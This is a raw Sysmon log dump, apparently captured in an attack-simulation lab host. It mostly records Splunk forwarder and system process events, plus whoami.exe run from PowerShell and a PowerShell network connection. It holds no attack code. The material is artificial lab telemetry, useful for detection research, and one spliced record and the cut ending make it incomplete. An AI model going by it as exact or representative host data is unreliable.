10341000x800000000000000036498039Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A19B-6140-9956-04000000C801}5700C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498038Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:27.160{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498037Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498036Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:27.160{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498035Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498034Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:27.160{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A19B-6140-9956-04000000C801}5700C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498033Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.160{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-A19B-6140-9956-04000000C801}5700C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll
+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000036498032Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:27.165{B81B27B7-A19B-6140-9956-04000000C801}5700C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.799{B81B27B7-A1A5-6140-9C56-04000000C801}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036498086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:37.482{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C35C7561BB7197CFF5CA4FDFB91B05F5,SHA256=FDD7D441D371E61B192697515D18C90CBFA7632D01A8AD0C45CACE0C20AC65A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:38.829{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F343B174F2A7150354AE87BC1E8240B,SHA256=C04FECCDC1193E51A5216C044202FD88F0078E83FE66298B45ECE53C271E1ABA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.829{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=724D1822279462A7BD21E15524A24E58,SHA256=FD25993DF3512EE5FD6C0969D9B52379B351D62AEE647445F5D5E1A985308B82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.666{B81B27B7-A1A6-6140-9D56-04000000C801}58884504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.513{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1979CF3C92D31F36DE72EDA48044B12,SHA256=3A95063884A969D8DE197DF659E03000440C339AF9F4C2B6BB81A0C42FB70D59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1A6-6140-9D56-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498103Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:38.498{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498102Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:38.498{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A1A6-6140-9D56-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.498{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A1A6-6140-9D56-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:38.483{B81B27B7-A1A6-6140-9D56-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036498097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.570{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50612-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.528{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67AFD40130D36CF92DC663AE5FA1AA08,SHA256=268D653C020EA74F081723C22A18A9D91A2AF652749C53CC0209A8AAC49C99DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:08.770{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50613-false10.0.1.12-8000- 10341000x800000000000000036498117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A1A7-6140-9E56-04000000C801}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:39.166{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:39.166{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:20:39.166{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 